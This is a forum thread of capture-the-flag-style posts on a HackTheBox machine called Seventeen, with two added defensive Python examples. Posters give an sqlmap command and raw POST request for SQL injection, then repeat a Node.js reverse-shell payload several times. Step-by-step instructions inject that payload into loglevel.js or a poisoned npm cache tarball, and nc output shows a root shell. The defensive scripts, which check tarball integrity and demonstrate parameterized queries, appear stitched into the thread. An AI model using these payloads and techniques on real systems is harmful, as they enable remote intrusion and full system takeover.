Posts: 15 Threads: 0 Joined: N/A
(May 30, 2022, 06:38 PM)Exa Wrote:
(May 30, 2022, 05:05 PM)hacktheboxer Wrote:
(May 28, 2022, 08:18 PM)Exa Wrote: There is an SQL injection vulnerability on http://seventeen.htb/vendor/oldmanagement/ (the stud_no parameter).
Using sqlmap, I found a valid login.
Could you show your sqlmap request, because I have tried with sqlmap and it fails?
My command is 'sqlmap -r sqlmap.txt -p stud_no --level=5 --risk=3', where sqlmap.txt is the POST request to the server.
sqlmap -r r.txt -p stud_no --level 2 --batch
r.txt contains:
POST /vendor/oldmanagement/ HTTP/1.1
Host: seventeen.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Origin: http://seventeen.htb
Connection: close
Referer: http://seventeen.htb/vendor/oldmanagement/
Cookie: PHPSESSID=1gnir2juq0ktu3bhh3j3egvf03
Upgrade-Insecure-Requests: 1
stud_no=11111&password=secret&login=
I guess the next step is uploading a shell file. After uploading the file I could not see it in 'School File Management System', and I have also browsed /uploads and other directories but I have not found it. What is the truth? I get a 200 code after uploading the file.
Posts: 15 Threads: 0 Joined: N/A
(May 28, 2022, 08:14 PM)iamnoone777 Wrote:
(May 28, 2022, 08:11 PM)Exa Wrote: There are three folders under http://seventeen.htb/vendor/: exams, mastermailer, oldmanagement
That sounds promising. I used raft-large-directories.txt and directory-list-2.3-big.txt but I didn't discover oldmanagement and mastermailer. How did you find them?
Posts: 213 Threads: 0 Joined: N/A
(May 31, 2022, 09:34 AM)hacktheboxer Wrote:
(May 28, 2022, 08:14 PM)iamnoone777 Wrote:
(May 28, 2022, 08:11 PM)Exa Wrote: There are three folders under http://seventeen.htb/vendor/: exams, mastermailer, oldmanagement
That sounds promising.
I used raft-large-directories.txt and directory-list-2.3-big.txt but I didn't discover oldmanagement and mastermailer. How did you find them?
Simply open http://seventeen.htb/vendor/. There is a directory listing.
Posts: 26 Threads: 0 Joined: N/A
Having problems with root privesc. Tried to edit the /opt/app/node_modules/loglevel/lib/loglevel.js file at the appropriate time, but each time I get a write error (I assume it is because of write permissions). Any suggestions besides "try harder"...
PS - I am able to capture the loglevel.js file and put my revshell at the top; I just can't seem to write it back.
Posts: 26 Threads: 0 Joined: N/A
(May 31, 2022, 03:31 PM)c0d3r Wrote: Having problems with root privesc. Tried to edit the /opt/app/node_modules/loglevel/lib/loglevel.js file at the appropriate time, but each time I get a write error (I assume it is because of write permissions). Any suggestions besides "try harder"...
PS - I am able to capture the loglevel.js file and put my revshell at the top; I just can't seem to write it back.
There is a problem with:
kavi@seventeen:~$ vi /opt/app/node_modules/loglevel/lib/loglevel.js
because of this:
kavi@seventeen:~$ ll /opt/app/node_modules/loglevel/lib/loglevel.js
-rw-r--r-- 1 root root 9562 Oct 26 1985 /opt/app/node_modules/loglevel/lib/loglevel.js
My workaround is to patch the package before the deployment. In order: spawn two terminal sessions on your host. On the first one, just start listening on your favorite port:
nc -nlvp PORT
On the second one:
ssh [email protected]
kavi@seventeen:~$ cd ~/.npm/loglevel/1.8.0/
kavi@seventeen:~/.npm/loglevel/1.8.0$ mkdir tarball
kavi@seventeen:~/.npm/loglevel/1.8.0$ mv package.tgz tarball/
kavi@seventeen:~/.npm/loglevel/1.8.0$ cd tarball/
kavi@seventeen:~/.npm/loglevel/1.8.0/tarball$ tar -xvf package.tgz
Now prepare the revshell with the correct IP and PORT:
(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("bash", []); var client = new net.Socket(); client.connect(PORT, "IP", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; // Prevents the Node.js application from crashing })();
and patch the package:
kavi@seventeen:~/.npm/loglevel/1.8.0/tarball$ vi package/lib/loglevel.js
kavi@seventeen:~/.npm/loglevel/1.8.0/tarball$ tar cf - package|gzip -f -9>package.tgz
kavi@seventeen:~/.npm/loglevel/1.8.0/tarball$ mv package.tgz ../
kavi@seventeen:~/.npm/loglevel/1.8.0/tarball$ cd ../
kavi@seventeen:~/.npm/loglevel/1.8.0$ rm -rf tarball
kavi@seventeen:~/.npm/loglevel/1.8.0$ sudo /opt/app/startup.sh
Finally you'll get the root shell spawned on your nc:
Listening on [0.0.0.0] (family 0, port 5150)
Connection from 10.129.95.105 44718 received!
id;whoami
uid=0(root) gid=0(root) groups=0(root)
root
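What makes Yondaime316's workaround possible is that a script run as root unpacks a package tarball that sits under the kavi user's home directory (~/.npm) and nothing checks that tarball before it is installed. The script below is an added example, not code from this thread or from the box: it shows the two checks a deploy step should make before unpacking a cached tarball, comparing it against the SRI integrity value a lockfile records (the "sha512-<base64>" form npm writes to package-lock.json) and refusing to read from a path owned by a non-root user or writable by others. The package name, file contents and lockfile entry are constructed here; the lockfile entry stands in for what npm would have recorded at install time.

```python
"""Verify a cached npm tarball before a privileged deploy step unpacks it.

Added example (not code from the thread or from the box). It assumes a
package-lock.json-style mapping from package name to an "integrity" value
of the form "sha512-<base64 digest>", which is the format npm writes.
The tarball contents, package name and lockfile entry are constructed.
"""
import base64
import gzip
import hashlib
import hmac
import io
import os
import stat
import tarfile
import tempfile

SRI_ALGORITHMS = ("sha256", "sha384", "sha512")
RUNNING_AS_ROOT = os.getuid() == 0


def sri_digest(data: bytes, algorithm: str = "sha512") -> str:
    """Return an SRI string ("sha512-<base64>") for the given bytes."""
    digest = hashlib.new(algorithm, data).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode()}"


def verify_sri(data: bytes, integrity: str) -> bool:
    """Check data against an SRI value; several space-separated entries are
    allowed and any single match is accepted, as the SRI spec permits."""
    for entry in integrity.split():
        algorithm, _, b64 = entry.partition("-")
        if algorithm not in SRI_ALGORITHMS or not b64:
            raise ValueError(f"unsupported integrity value: {entry!r}")
        actual = hashlib.new(algorithm, data).digest()
        # constant-time comparison so the check itself leaks nothing
        if hmac.compare_digest(actual, base64.b64decode(b64)):
            return True
    return False


def untrusted_source(path: str) -> bool:
    """True when a root-run deploy should not read this path: it is owned by
    a non-root user, or group/others can write to it."""
    st = os.stat(path)
    return st.st_uid != 0 or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def probe_untrusted(mode: int) -> bool:
    """Create a throwaway file with the given mode and run untrusted_source on it."""
    fd, path = tempfile.mkstemp()
    os.close(fd)
    try:
        os.chmod(path, mode)
        return untrusted_source(path)
    finally:
        os.unlink(path)


def deploy_check(name: str, cached_tarball: bytes, lock: dict) -> tuple:
    """Decide whether the cached tarball for `name` may be unpacked."""
    entry = lock.get(name)
    if entry is None:
        return False, f"{name}: not in lockfile, refusing to unpack"
    if not verify_sri(cached_tarball, entry["integrity"]):
        return False, f"{name}@{entry['version']}: tarball does not match lockfile integrity"
    return True, f"{name}@{entry['version']}: integrity ok"


def make_package_tarball(files: dict) -> bytes:
    """Build an in-memory .tgz laid out like an npm package (package/<path>).
    gzip mtime is pinned to 0 so identical inputs give identical bytes."""
    buf = io.BytesIO()
    with gzip.GzipFile(fileobj=buf, mode="wb", mtime=0) as gz:
        with tarfile.open(fileobj=gz, mode="w") as tar:
            for name in sorted(files):
                content = files[name]
                info = tarfile.TarInfo(name=f"package/{name}")
                info.size = len(content)
                tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


def demo() -> dict:
    """Run the checks on a pristine tarball and on one whose lib file was edited."""
    lib = b"module.exports = {};\n"
    meta = b'{"name": "loglevel", "version": "1.8.0"}\n'
    pristine = make_package_tarball({"package.json": meta, "lib/loglevel.js": lib})
    # Constructed stand-in for the entry npm writes at install time.
    lock = {"loglevel": {"version": "1.8.0", "integrity": sri_digest(pristine)}}
    # Same package with a harmless marker line added at the top of the lib file.
    modified = make_package_tarball(
        {"package.json": meta, "lib/loglevel.js": b"/* constructed marker */\n" + lib})
    return {
        "pristine": deploy_check("loglevel", pristine, lock),
        "modified": deploy_check("loglevel", modified, lock),
        "unknown": deploy_check("leftpad", pristine, lock),
    }


if __name__ == "__main__":
    for label, (ok, msg) in demo().items():
        print(f"{label:9s} {'ALLOW' if ok else 'BLOCK'}  {msg}")
```

Running it prints ALLOW for the pristine tarball and BLOCK for both the edited tarball and the package missing from the lockfile. In practice the same effect is obtained by installing with `npm ci` from a committed lockfile into a directory that only root can write, rather than from a cache under an unprivileged user's home.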
Posts: 26 Threads: 0 Joined: N/A
Thanks Yondaime316!
That worked great.
Posts: 0 Threads: 0 Joined: N/A
The SQLi doesn't work anymore, and accessing /files/31234 is unauthorized (403). I can upload a PHP shell but can't access it... The root method listed here has been patched also.
Posts: 129 Threads: 0 Joined: N/A
open file ????
(May 30, 2022, 03:13 AM)Himitsu Wrote:
(May 30, 2022, 01:54 AM)Peter Wrote:
(May 29, 2022, 06:27 AM)dude4695 Wrote: for root
better create 2 SSH connections: 1 for running startup.sh and 1 for editing the file
ssh1: sudo /opt/app/startup.sh
ssh2: vim /opt/app/node_modules/loglevel/lib/loglevel.js
and add this function at the top of the file:
(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("bash", []); var client = new net.Socket(); client.connect(PORT, "IP", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; // Prevents the Node.js application from crashing })();
You can get this payload from here:
https://www.revshells.com/
Stop the startup.sh app and run it again; you will get a root shell.
I can't make it run. The file disappears. No reverse shell, the code to inject vanishes. Any tip or idea? Please.
You need to do this a little bit faster, else the loglevel directory will be removed.
Copy this function into memory (Ctrl+C) and replace IP and PORT with yours:
(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("bash", []); var client = new net.Socket(); client.connect(4000, "10.10.1X.XX", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; // Prevents the Node.js application from crashing })();
1. On Terminal 1, open SSH with the kavi user.
2. On Terminal 2, open a second SSH with the kavi user, then prepare your command (but don't launch it yet, because the file does not exist yet): vim /opt/app/node_modules/loglevel/lib/loglevel.js
3. On Terminal 3: nc -lvnp 4000
4. On Terminal 1: sudo /opt/app/startup.sh
5. On Terminal 2: launch your previous command and paste your function from step 2 at the TOP, then write and exit (with :x it's faster).
6. On Terminal 1: quit and re-run sudo /opt/app/startup.sh
7. On Terminal 3: we can see your reverse shell has been triggered:
$ nc -lvnp 4000
listening on [any] 4000 ...
connect to [10.10.XX.XX] from (UNKNOWN) [10.10.11.165] 50614
uid=0(root) gid=0(root) groups=0(root)
You need to switch quickly between your 2 SSH sessions for steps 4, 5 and 6, that's all.
All explanations from @Dude4695 are enough.
can't
Posts: 129 Threads: 0 Joined: N/A
(May 30, 2022, 03:13 AM)Himitsu Wrote:
(May 30, 2022, 01:54 AM)Peter Wrote:
(May 29, 2022, 06:27 AM)dude4695 Wrote: for root
better create 2 SSH connections: 1 for running startup.sh and 1 for editing the file
ssh1: sudo /opt/app/startup.sh
ssh2: vim /opt/app/node_modules/loglevel/lib/loglevel.js
and add this function at the top of the file:
(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("bash", []); var client = new net.Socket(); client.connect(PORT, "IP", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; // Prevents the Node.js application from crashing })();
You can get this payload from here:
https://www.revshells.com/
Stop the startup.sh app and run it again; you will get a root shell.
I can't make it run. The file disappears. No reverse shell, the code to inject vanishes. Any tip or idea? Please.
You need to do this a little bit faster, else the loglevel directory will be removed.
Copy this function into memory (Ctrl+C) and replace IP and PORT with yours:
(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("bash", []); var client = new net.Socket(); client.connect(4000, "10.10.1X.XX", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; // Prevents the Node.js application from crashing })();
1. On Terminal 1, open SSH with the kavi user.
2. On Terminal 2, open a second SSH with the kavi user, then prepare your command (but don't launch it yet, because the file does not exist yet): vim /opt/app/node_modules/loglevel/lib/loglevel.js
3. On Terminal 3: nc -lvnp 4000
4. On Terminal 1: sudo /opt/app/startup.sh
5. On Terminal 2: launch your previous command and paste your function from step 2 at the TOP, then write and exit (with :x it's faster).
6. On Terminal 1: quit and re-run sudo /opt/app/startup.sh
7. On Terminal 3: we can see your reverse shell has been triggered:
$ nc -lvnp 4000
listening on [any] 4000 ...
connect to [10.10.XX.XX] from (UNKNOWN) [10.10.11.165] 50614
uid=0(root) gid=0(root) groups=0(root)
You need to switch quickly between your 2 SSH sessions for steps 4, 5 and 6, that's all.
All explanations from @Dude4695 are enough.
"/opt/app/node_modules/loglevel/lib/loglevel.js" E212: Can't open file for writing
Posts: 28 Threads: 0 Joined: N/A
(June 2, 2022, 06:58 AM)sydewayzlocc Wrote: The SQLi doesn't work anymore, and accessing /files/31234 is unauthorized (403). I can upload a PHP shell but can't access it... The root method listed here has been patched also.
Yep, you are right. It's showing 403 for PHP files. I tried with an extension bypass but no luck.
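The stud_no injection the thread opens with is the textbook case of a login query assembled by string concatenation, which is why sqlmap could drive it. The script below is an added example, not code from this thread or from the School File Management System: it puts the unsafe lookup next to a parameterized one over an in-memory SQLite table so the difference in what each accepts is visible, and wraps the safe lookup in a login routine that validates the student-number format first, stores a salted PBKDF2 hash instead of the password, and compares in constant time. The table, student number, password and the digits-only format rule are all constructed here.

```python
"""Student-number login: string-built query beside a parameterized one.

Added example (not code from the thread or from the School File Management
System). Table, student number, password and format rule are constructed.
"""
import hashlib
import hmac
import os
import re
import sqlite3

STUD_NO_RE = re.compile(r"^[0-9]{1,12}$")  # assumed format: digits only
# Constructed input that closes the quote and makes the WHERE clause always true.
TAUTOLOGY = "' OR '1'='1"


def hash_password(password: str, salt: bytes) -> bytes:
    """Salted PBKDF2-HMAC-SHA256; the database never holds the password itself."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def build_demo_db() -> sqlite3.Connection:
    """In-memory table standing in for the application's students table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE students (stud_no TEXT PRIMARY KEY, name TEXT, "
        "salt BLOB, pw_hash BLOB)"
    )
    for stud_no, name, password in [("11111", "Constructed Student", "secret")]:
        salt = os.urandom(16)
        conn.execute("INSERT INTO students VALUES (?, ?, ?, ?)",
                     (stud_no, name, salt, hash_password(password, salt)))
    conn.commit()
    return conn


def fetch_student_unsafe(conn: sqlite3.Connection, stud_no: str):
    """The vulnerable shape: the input is spliced into the SQL text, so a quote
    character in stud_no rewrites the query's logic instead of being data."""
    sql = f"SELECT stud_no, name FROM students WHERE stud_no = '{stud_no}'"
    return conn.execute(sql).fetchone()


def fetch_student_safe(conn: sqlite3.Connection, stud_no: str):
    """Hardened: the value is bound as a parameter and can only ever be data."""
    sql = "SELECT stud_no, name FROM students WHERE stud_no = ?"
    return conn.execute(sql, (stud_no,)).fetchone()


def login(conn: sqlite3.Connection, stud_no: str, password: str) -> bool:
    """Validate the format, look the row up with a bound parameter, and
    compare the password hash in constant time."""
    if not STUD_NO_RE.match(stud_no):
        return False
    row = conn.execute("SELECT salt, pw_hash FROM students WHERE stud_no = ?",
                       (stud_no,)).fetchone()
    if row is None:
        # Hash anyway so an unknown account costs the same time as a wrong password.
        hash_password(password, b"\x00" * 16)
        return False
    salt, pw_hash = row
    return hmac.compare_digest(hash_password(password, salt), pw_hash)


if __name__ == "__main__":
    conn = build_demo_db()
    print("unsafe, real number:", fetch_student_unsafe(conn, "11111"))
    print("unsafe, tautology  :", fetch_student_unsafe(conn, TAUTOLOGY))
    print("safe,   tautology  :", fetch_student_safe(conn, TAUTOLOGY))
    print("login ok           :", login(conn, "11111", "secret"))
    print("login wrong pw     :", login(conn, "11111", "guess"))
```

The unsafe lookup returns a row for the tautology input without a valid student number, which is exactly the foothold an injection tool needs; the parameterized lookup returns nothing for it, and the login routine never even sends it to the database because it fails the format check.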